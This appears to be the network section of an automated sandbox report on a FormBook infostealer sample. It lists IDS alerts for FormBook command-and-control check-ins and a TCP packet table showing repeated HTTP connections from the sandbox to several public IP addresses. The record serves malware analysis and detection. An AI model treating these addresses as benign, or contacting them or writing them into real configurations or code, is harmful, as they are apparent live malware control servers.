                        2024-09-03T10:45:34.598530+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316499980192.168.2.4161.97.168.245
                        2024-09-03T10:46:51.843934+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316501980192.168.2.4188.114.97.3
                        2024-09-03T10:46:37.934520+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316501580192.168.2.485.159.66.93
                        2024-09-03T10:44:33.730485+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316498980192.168.2.4162.0.239.141
                        2024-09-03T10:45:47.751813+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316500380192.168.2.43.33.130.190
                        2024-09-03T10:44:41.933384+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316499180192.168.2.4199.59.243.226
                        2024-09-03T10:44:28.528096+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316498780192.168.2.4162.0.239.141
                        2024-09-03T10:46:54.223315+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316502080192.168.2.4188.114.97.3
                        2024-09-03T10:43:49.860515+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316497680192.168.2.4199.59.243.226
                        2024-09-03T10:46:18.924552+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316501280192.168.2.413.248.169.48
                        2024-09-03T10:46:02.214733+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316500780192.168.2.4218.247.68.184
                        2024-09-03T10:45:09.574571+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316499780192.168.2.45.144.130.52
                        2024-09-03T10:46:16.082124+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316501180192.168.2.413.248.169.48
                        2024-09-03T10:43:52.570998+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316497780192.168.2.4199.59.243.226
                        2024-09-03T10:44:31.069926+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316498880192.168.2.4162.0.239.141
                        2024-09-03T10:44:44.455444+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316499280192.168.2.4199.59.243.226
                        2024-09-03T10:44:07.048957+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316498180192.168.2.4154.23.184.240
                        2024-09-03T10:46:43.036728+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316501780192.168.2.485.159.66.93
                        2024-09-03T10:45:51.371433+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316500480192.168.2.43.33.130.190
                        2024-09-03T10:46:40.500505+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316501680192.168.2.485.159.66.93
                        2024-09-03T10:46:07.584283+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316500980192.168.2.4218.247.68.184
                        2024-09-03T10:45:52.847260+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316500580192.168.2.43.33.130.190
                        2024-09-03T10:46:56.818565+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316502180192.168.2.4188.114.97.3
                        2024-09-03T10:44:47.032770+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316499380192.168.2.4199.59.243.226
                        2024-09-03T10:43:47.542947+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316497580192.168.2.4199.59.243.226
                        2024-09-03T10:46:21.417014+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316501380192.168.2.413.248.169.48
                        2024-09-03T10:44:04.255956+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316498080192.168.2.4154.23.184.240
                        2024-09-03T10:45:37.169364+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316500080192.168.2.4161.97.168.245

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 3, 2024 10:43:31.228004932 CEST4973680192.168.2.4198.58.118.167
                        Sep 3, 2024 10:43:31.232786894 CEST8049736198.58.118.167192.168.2.4
                        Sep 3, 2024 10:43:31.232881069 CEST4973680192.168.2.4198.58.118.167
                        Sep 3, 2024 10:43:31.240164042 CEST4973680192.168.2.4198.58.118.167
                        Sep 3, 2024 10:43:31.244920015 CEST8049736198.58.118.167192.168.2.4
                        Sep 3, 2024 10:43:31.725141048 CEST8049736198.58.118.167192.168.2.4
                        Sep 3, 2024 10:43:31.725155115 CEST8049736198.58.118.167192.168.2.4
                        Sep 3, 2024 10:43:31.725171089 CEST8049736198.58.118.167192.168.2.4
                        Sep 3, 2024 10:43:31.725359917 CEST4973680192.168.2.4198.58.118.167
                        Sep 3, 2024 10:43:31.728365898 CEST4973680192.168.2.4198.58.118.167
                        Sep 3, 2024 10:43:31.733139038 CEST8049736198.58.118.167192.168.2.4
                        Sep 3, 2024 10:43:46.867100954 CEST6497580192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:46.871994972 CEST8064975199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:46.872071981 CEST6497580192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:46.882070065 CEST6497580192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:46.886919022 CEST8064975199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:47.542840004 CEST8064975199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:47.542860031 CEST8064975199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:47.542870045 CEST8064975199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:47.542879105 CEST8064975199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:47.542947054 CEST6497580192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:48.386956930 CEST6497580192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:49.405355930 CEST6497680192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:49.410542011 CEST8064976199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:49.410732031 CEST6497680192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:49.426989079 CEST6497680192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:49.431786060 CEST8064976199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:49.860321045 CEST8064976199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:49.860337019 CEST8064976199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:49.860347033 CEST8064976199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:49.860515118 CEST6497680192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:50.933708906 CEST6497680192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:51.952159882 CEST6497780192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:52.093039989 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.093116045 CEST6497780192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:52.104077101 CEST6497780192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:52.109632015 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.109642982 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.109649897 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.109658003 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.109757900 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.109766960 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.109770060 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.109774113 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.109776974 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.570928097 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.570943117 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.570955992 CEST8064977199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:52.570997953 CEST6497780192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:52.571042061 CEST6497780192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:53.618263006 CEST6497780192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:54.624068975 CEST6497880192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:54.628987074 CEST8064978199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:54.629090071 CEST6497880192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:54.635910988 CEST6497880192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:54.640707970 CEST8064978199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:55.070641994 CEST8064978199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:55.070658922 CEST8064978199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:55.070672989 CEST8064978199.59.243.226192.168.2.4
                        Sep 3, 2024 10:43:55.070928097 CEST6497880192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:55.070928097 CEST6497880192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:55.073441029 CEST6497880192.168.2.4199.59.243.226
                        Sep 3, 2024 10:43:55.078218937 CEST8064978199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:00.845319986 CEST6497980192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:00.850147009 CEST8064979154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:00.850239992 CEST6497980192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:00.860408068 CEST6497980192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:00.865303040 CEST8064979154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:01.742069006 CEST8064979154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:01.742245913 CEST8064979154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:01.742289066 CEST6497980192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:02.371187925 CEST6497980192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:03.389669895 CEST6498080192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:03.394583941 CEST8064980154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:03.394666910 CEST6498080192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:03.404881954 CEST6498080192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:03.409799099 CEST8064980154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:04.255404949 CEST8064980154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:04.255903959 CEST8064980154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:04.255955935 CEST6498080192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:04.918068886 CEST6498080192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:05.942894936 CEST6498180192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:05.948018074 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:05.948177099 CEST6498180192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:05.977171898 CEST6498180192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:05.982045889 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:05.982058048 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:05.982074976 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:05.982084036 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:05.982170105 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:05.982178926 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:05.982228994 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:05.982238054 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:05.982248068 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:07.048290968 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:07.048894882 CEST8064981154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:07.048957109 CEST6498180192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:07.480639935 CEST6498180192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:08.499289989 CEST6498280192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:08.504304886 CEST8064982154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:08.504394054 CEST6498280192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:08.511388063 CEST6498280192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:08.516262054 CEST8064982154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:09.372620106 CEST8064982154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:09.372653961 CEST8064982154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:09.372800112 CEST6498280192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:09.375365019 CEST6498280192.168.2.4154.23.184.240
                        Sep 3, 2024 10:44:09.380247116 CEST8064982154.23.184.240192.168.2.4
                        Sep 3, 2024 10:44:27.939465046 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:27.949209929 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:27.954405069 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:27.963745117 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:27.968581915 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.528044939 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.528060913 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.528069973 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.528095961 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:28.528111935 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.528124094 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.528135061 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.528146029 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.528147936 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:28.528156042 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.528167009 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.528173923 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:28.528177977 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.528196096 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:28.528218985 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:28.533014059 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.533035040 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.533073902 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:28.533365965 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.533375025 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.533405066 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:28.610707045 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.610723019 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.610734940 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.610770941 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:28.610908985 CEST8064987162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:28.610955000 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:29.466279984 CEST6498780192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:30.484874010 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:30.489649057 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:30.489713907 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:30.505765915 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:30.510653973 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.069830894 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.069844007 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.069849968 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.069889069 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.069899082 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.069910049 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.069921017 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.069926023 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:31.069927931 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.069941998 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.069956064 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.069967031 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:31.069988012 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:31.070000887 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:31.074789047 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.074801922 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.074811935 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.074842930 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:31.121208906 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:31.155983925 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.156064987 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.156111002 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:31.156152964 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.156166077 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.156208038 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:31.156371117 CEST8064988162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:31.156415939 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:32.011881113 CEST6498880192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.032255888 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.153733015 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.153810978 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.168747902 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.173844099 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.173855066 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.173873901 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.173883915 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.173903942 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.173913002 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.173943996 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.174043894 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.174053907 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.730403900 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.730429888 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.730441093 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.730454922 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.730474949 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.730484962 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.730488062 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.730499983 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.730509043 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.730520964 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.730532885 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.730623960 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.731102943 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.731113911 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.734360933 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.735368013 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.735378981 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.735388994 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.735399961 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.735409975 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.735424995 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.735503912 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.814199924 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.814213037 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.814224958 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.814270020 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:33.814481020 CEST8064989162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:33.814747095 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:34.683753967 CEST6498980192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:35.702361107 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:35.707169056 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:35.710401058 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:35.717251062 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:35.722090006 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.274971962 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.274993896 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.275007963 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.275019884 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.275032997 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.275152922 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.275156975 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:36.275166035 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.275214911 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:36.275238991 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.275295973 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.275305986 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.275316954 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:36.275352001 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:36.279951096 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.279975891 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.279987097 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.280112982 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:36.280343056 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.282398939 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:36.357820988 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.357872009 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.357883930 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.357899904 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:36.358026028 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:36.358026028 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:36.362302065 CEST6499080192.168.2.4162.0.239.141
                        Sep 3, 2024 10:44:36.367324114 CEST8064990162.0.239.141192.168.2.4
                        Sep 3, 2024 10:44:41.458412886 CEST6499180192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:41.463578939 CEST8064991199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:41.470299006 CEST6499180192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:41.478301048 CEST6499180192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:41.483164072 CEST8064991199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:41.933306932 CEST8064991199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:41.933324099 CEST8064991199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:41.933335066 CEST8064991199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:41.933383942 CEST6499180192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:41.933444023 CEST6499180192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:42.980676889 CEST6499180192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:43.999677896 CEST6499280192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:44.004607916 CEST8064992199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:44.008642912 CEST6499280192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:44.020411968 CEST6499280192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:44.025311947 CEST8064992199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:44.455370903 CEST8064992199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:44.455391884 CEST8064992199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:44.455410957 CEST8064992199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:44.455444098 CEST6499280192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:44.455486059 CEST6499280192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:45.532306910 CEST6499280192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:46.563556910 CEST6499380192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:46.569324017 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:46.569391012 CEST6499380192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:46.582942963 CEST6499380192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:46.589230061 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:46.589242935 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:46.589266062 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:46.589277983 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:46.589298964 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:46.589310884 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:46.589323044 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:46.589366913 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:46.589379072 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:47.032680988 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:47.032713890 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:47.032769918 CEST6499380192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:47.032792091 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:47.032841921 CEST6499380192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:48.090120077 CEST6499380192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.109425068 CEST6499480192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.114343882 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.114418983 CEST6499480192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.123464108 CEST6499480192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.128364086 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.740858078 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.740905046 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.740916014 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.741106987 CEST6499480192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.741156101 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.742402077 CEST6499480192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.746311903 CEST6499480192.168.2.4199.59.243.226
